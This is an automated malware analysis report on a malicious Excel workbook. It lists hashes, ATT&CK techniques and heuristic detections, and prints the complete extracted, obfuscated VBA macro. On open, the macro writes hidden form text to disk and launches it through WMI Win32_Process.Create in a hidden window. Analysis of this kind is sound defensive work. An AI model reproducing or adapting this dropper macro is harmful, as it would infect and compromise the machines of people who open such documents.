Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 29454692e8325328…

MALICIOUS

Office (OOXML) / .XLSX

183.4 KB Created: 2021-03-22 13:13:29 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2022-07-13
MD5: 230aaf5029e89ab1b99a03cd7b8ce361 SHA-1: e18fe2b95f5aeb34e7b4736d6c89b71307d00148 SHA-256: 29454692e832532818525a9a61453f95a2dd9e7b3adb9c794295db377420ba38
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The OOXML file contains VBA macros, specifically a Workbook_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of a GetObject call and p-code auto-execution further indicates malicious intent. The script's obfuscated nature and truncated content prevent a definitive analysis of its exact payload, but the overall pattern suggests it's designed to download and execute a secondary malicious component.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set wPozVwdmPCyEXp = GetObject(sYOpFddrVYp.w_nVLDlp).SpawnInstance_
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8439 bytes
SHA-256: 275054aa8ec129c8e42e57802dc36607e01dc1168415e78d832e7e1e702e6c90
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
BTSmHc_0HEZmv = IsError(IsError(hfa9mGb))
IsArray (IsDate(XVt8YS))
SwIOWWI = IsMissing(IsNumeric("WNwwBiH"))
lOqWUpdEspdvLsbu.s_i_F_zogoHJF_QwGHD
IsMissing (IsArray(EGQllY6))
IsDate ("UXbYPF_Sfp9Qd")
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "lRdQ_mtBs"
Function kq_aDivOmaPBNgXoNH_ZZFdVw()

s2z1nec_vEz0Pg = IsDate("W9mPqe_poJkR")

IQSAEoEbdK30K = IsObject(wOuVeV_ImyuDn)

IsNull (IsDate(GsqS0S))

kq_aDivOmaPBNgXoNH_ZZFdVw = Range("FM125")

v9j2X6_oeUrXf = IsDate(IsNumeric("c8t5Xxb_pVSR0Y"))

MJXbzqb = IsEmpty("vM5dck1_WgVOV")

IsEmpty ("QEwqVWP_7wTvv")

End Function

Function aODjNGONvsH()

wuLow7 = IsArray(tjoZL5)

l9vLq9 = IsDate(IsArray("G2MFCzd"))

vcmSOSwEmOQp = Chr(CLng((Not -103))) _
 
IsNull (IsNull(G2SazMC))
gkn_mBrlMwcflnwtxuA = Chr(CLng((Not -33))) _
 
xHWHsoDqLfxolJxaPpOyPygqf = Chr(32)
Lr_wbEjNYjSINiJizp = Chr(CLng((((-876 + 31#) - -264#) - -697))) _
 
IsObject (IsDate("gqv7RS4jqguS"))
HkcVgZPJzeYyDF__pREYsRS = Chr(CLng((Not -115)))
IsNull (OcAlSZ)
dU_RPfrAAv = ChrW(116)
ZjLLgXe_fitdA = IsDate(uSuTQ1_sOn8k5)
GfNUSENs_EssE = Chr(58)
ZKgAXorw_hKYJa = Chr(CLng(((-1.06566820276498E-03 * (0.24390243902439 * 861)) * -496)))
sFrMWAI = Chr(CLng((Not (0.147692307692308 * (144 + -469#)))))
NISqumCQCJkxgWmrBOcGB_c = ChrW(CLng(((-0.508196721311475 * -61) Xor 124)))
kd3Lb0_L7NGI = IsMissing(IsNull(NjxfO1C))
nKrauOIJPOcnno_eJ_LNsH = Chr(CLng((-0.209503239740821 * -463)))
AzGgWz8_XrjWxI = IsDate(IsNumeric(YV2sUZ7_qnj3la))
yVhpl_K_YiPPX_LfwRrsC_bEJSwcW = Chr(CLng((503 - xlDialogChartAddData))) _
 
XKMY_DCehdlbH = ChrW(CLng((125 And xlPyramidBarClustered))) _
 
ZBYUhBIQRvcfh = ChrW(101)
Rt2kpLa7fNYeR = IsEmpty(IsDate("UfDfc6w_TbcqdT"))
aODjNGONvsH = ChrW(119) _
  + XKMY_DCehdlbH + ChrW(CLng(((-1075 - -740#) - -440))) + NISqumCQCJkxgWmrBOcGB_c + gkn_mBrlMwcflnwtxuA + ZKgAXorw_hKYJa + ChrW(CLng((-313 - -428))) _
  + xHWHsoDqLfxolJxaPpOyPygqf + Chr(103) + ZBYUhBIQRvcfh + dU_RPfrAAv + Chr(CLng(((1265 - 244#) + (-560 - 429#)))) + sFrMWAI + vcmSOSwEmOQp + yVhpl_K_YiPPX_LfwRrsC_bEJSwcW + HkcVgZPJzeYyDF__pREYsRS + ChrW(109) _
  + nKrauOIJPOcnno_eJ_LNsH + Lr_wbEjNYjSINiJizp + GfNUSENs_EssE

YJPkQQ = IsMissing(IsObject("xcXzU3_H0VKRQ"))

IsMissing (EpO4HUseDIzsQ)

IsMissing (IsNumeric("lYw16b_B1otN"))

End Function


Attribute VB_Name = "sYOpFddrVYp"
Function ihtkTUBPUpLFqNviPkhajZT()

IsNull (IsNull(OSlm0e))

IsDate ("IoY4Trx")

cOEZTzkDYPfhH = IsObject(rsrGo1U0fXc)

IsError (IsNumeric("hnVhdBgF6o23x"))

IsEmpty (IsError(RMzj0G))

IsDate (IsObject(HfWT6Bc_oIWZRk))
aUDGLGqKn_QHDaJFrpXCYnuFgMw_h = lRdQ_mtBs.kq_aDivOmaPBNgXoNH_ZZFdVw
GTno0T = IsEmpty("Gkm8vB7Axyuf")
IsMissing ("Mgci3wzX5spH")
Twmdyh_iIL00M = IsMissing("M0JkCp_1zOvCP")
ihtkTUBPUpLFqNviPkhajZT = aUDGLGqKn_QHDaJFrpXCYnuFgMw_h

IsError (IsMissing(MerAtNuIUi2e))

IsObject (UUKlz1d)

IsArray ("GV4RDGv")

End Function

Function w_nVLDlp()

IsNumeric ("ecJpXrv")

IsDate (tMrvm6juM3w)

tZS07tC = IsDate(IsNumeric("ANj0tg0qLDRe6"))
jjEWMvpYolnCPH_cXgfIougCbze = Mid("VFiMTh\winmgmts:\root\cimv2:Win32_Pr<2iv)", 8, 29)
IsDate ("TlVm85h")
dHXd9i = IsArray(IsDate(YSuddc_dqR3wo))
IsArray ("VSb7cj")
IsError (IsNull("JEK8235_Ay1PT"))
ngPXnDG_nnLKxL = IsEmpty(BBznYjbtprh)
W4krvLj = IsDate("SmJJCXE_yo8RxB")
IsNull (IsDate("l0EMOe_b44DS"))
RFsmAEnwoQ = Range("CO77")
w_nVLDlp = Join(Array(jjEWMvpYolnCPH_cXgfIougCbze + RFsmAEnwoQ))

IsError (owdiSUY)

UOX20mnA9OT0 = IsMissing("UNG7BSo")

V9x4Ki_vy54oK = IsObject("WpXr16jnykmN")

End Function

Attribute VB_Name = "suZjjqhMIKKwO_XfJ_Np"
Attribute VB_Base = "0{6F4FE49F-E257-450C-A73F-3CFDF6F789DB}{F79837EC-6EC8-4426-AFBE-D63B94D0EA61}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function wPozVwdmPCyEXp()

L6lNSM = IsError(IsError("MMJbgGO"))

LA9cqFeN5LUE = IsEmpty(XqWEQawSgl15H)

IsError ("CPgp4isTujS")

Set wPozVwdmPCyEXp = GetObject(sYOpFddrVYp.w_nVLDlp).SpawnInstance_

IsArray ("X0updT_Uenzi")

IsDate (IsObject("pkwQS8"))

WNEIVhC = IsDate("yVwDZI_BH3LyQ")

With wPozVwdmPCyEXp

.ShowWindow = CLng(((-472 + 484#) Xor xlDataAndLabel))

End With

IsError (WpYzc3k652Qz)

fI7LHOkx2lUkE = IsError("Lg8bro")

YLAredV = IsNumeric(S60mxw_N0nSD)

End Function

Attribute VB_Name = "LAlDWGOQh_arnMxEPVSw"
Attribute VB_Base = "0{CD263F86-6132-4392-8A3C-34923620D19A}{AD82E8DB-79E2-4999-9815-8C7581EDF9EF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function CmRyWYgMDoOOXfWblq_Y_r_dHlG()
IsEmpty (IsEmpty("FOjyjEc"))
IsDate ("NQXKvzl0ESO")
IsDate (IsDate(VsIjNK))
kWO9ncG = IsEmpty(BXdIK9_ZVwve)
IsEmpty (IsDate(FMvEFB))
FxcjEEIVgvsz = Chr(CLng((xlDialogActivate And xlDialogRowHeight)))
lqd_HWIuNky = ChrW(CLng((124 And 118)))
Y44putM = IsArray(IsNull("G4qJPt2lki3N"))
PP_BNPJV_P = Chr(118)
dtewQVe5pXIu = IsMissing(CUhhvk)
h_MxpribSNKmNsKxeqYOXRXIaEEkT = ChrW(92)
IsArray (DCFjxV)
B_MPcUiZfsnSMupY = ChrW(CLng((Not -59)))
NyCOxW = IsDate(IsMissing("NkHtt0"))
WZ6qwN = IsEmpty(IsEmpty("LlA1m0evJAC"))
CmRyWYgMDoOOXfWblq_Y_r_dHlG = ChrW(CLng((0.113225499524263 * ((0.699046754425783 * 2203) - 489#)))) + ChrW(105) + Chr(110) _
  + Chr(CLng((Not (xlDialogWorkgroup + (-1263 + 954#))))) + FxcjEEIVgvsz + ChrW(CLng((((-655 - -633#) + 735#) - 604))) _
  + ChrW(CLng((Not (-658 - -541#)))) + ChrW(115) + ChrW(CLng(((1213 + -340#) + (-941 - -126#)))) _
  + Chr(114) _
  + Chr(111) + Chr(CLng(((-1.25027455353372E-04 * -981) * 905))) + lqd_HWIuNky + h_MxpribSNKmNsKxeqYOXRXIaEEkT + ChrW(CLng((xlDialogFormulaFind - -35))) + Chr(CLng((xlExcel3 Xor 116))) + Chr(CLng(((xlDialogTabOrder - 297#) Xor (1.32013201320132E-02 * 909)))) + PP_BNPJV_P + ChrW(CLng((Not -51))) + B_MPcUiZfsnSMupY + Chr(CLng((-471 - -558))) + Chr(CLng((xlConeCol And xlDialogRowHeight))) + Range("HF116") + Replace(",/5cC,/5cC,/5cC,/5cCProcess", ",/5cC", "") _
 
IsMissing (IsDate("U7qekmk"))
MloBIOq_9fp5M = IsArray("GedR3Gf")
IsDate (IsArray("Bxq5GBb"))
End Function


Attribute VB_Name = "lOqWUpdEspdvLsbu"
Function s_i_F_zogoHJF_QwGHD()
Dim hqRREKewYDJToW_Pe_pG_IOaAqXxj As String
A2WOgLX_AMhn2 = IsMissing(IsEmpty("XegRZUZShB6"))
IsEmpty (IsDate("xIg4ogv"))
hqRREKewYDJToW_Pe_pG_IOaAqXxj = Replace(suZjjqhMIKKwO_XfJ_Np.Lk_MlbhdEixFU_ioQgheowZg.Text, "viXKLi;kOJt!", "")
Qslv4b_lyrmWE = IsEmpty(IsError("IO2OlE_jt1aVY"))
IsEmpty (DzFBzM)
ZhALScm_TBMak = IsMissing(OodALZ)
Open Application.ActiveWorkbook.Path & sYOpFddrVYp.ihtkTUBPUpLFqNviPkhajZT For Binary As #CLng((xlSpeakByColumns Xor xlDone))
L0Qz8Efc1X9Jt = IsArray(IsDate(SgftKYh))
Z3e0YHKTlMi = IsMissing(IsNumeric(Vb6tqf_FMQzC1))
Put #CLng((xlArrowHeadLengthShort And xlArabicStrictAlefHamza)), , hqRREKewYDJToW_Pe_pG_IOaAqXxj
IsNull (IsEmpty("Tx8TXme"))
wDr3w0o = IsArray("Rh3Cx97_T0GCse")
Close #CLng(((xlDialogFileSharing + -570#) - -90))
IsEmpty ("g9ZDy8gjipKP")
IsNull (IsArray(D93cV5))
bNeQcrNhumRjV_pbFLQR_f
IsObject (IsDate(JWXxEB))
IsError (IsNumeric("Zy23jm_PREdgt"))
End Function
Function bNeQcrNhumRjV_pbFLQR_f()
PAH0U6F = IsDate(SN0jlRUa2fp5)
EmUbBmq = IsArray(IsObject("NU4nKG"))
IsError (IsNull(Rrceccx))
With GetObject(LAlDWGOQh_arnMxEPVSw.CmRyWYgMDoOOXfWblq_Y_r_dHlG)
.Create lRdQ_mtBs.aODjNGONvsH & Chr(34) & Application.ActiveWorkbook.Path & sYOpFddrVYp.ihtkTUBPUpLFqNviPkhajZT & Chr(34), Null, suZjjqhMIKKwO_XfJ_Np.wPozVwdmPCyEXp
End With
IsNumeric (IsObject("Llm8Ukq"))
NnZXSAU = IsArray(JuWuijT)
ErB1uN8_e8eE1S = IsNull(IsMissing(xiKX72))
IsNull (IsError(egZDybRiGDVZ))
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 57344 bytes
SHA-256: 13e9bca0e36e93585fa70e507fa2b11f33ce395a1c52b32aac3bfde85968288b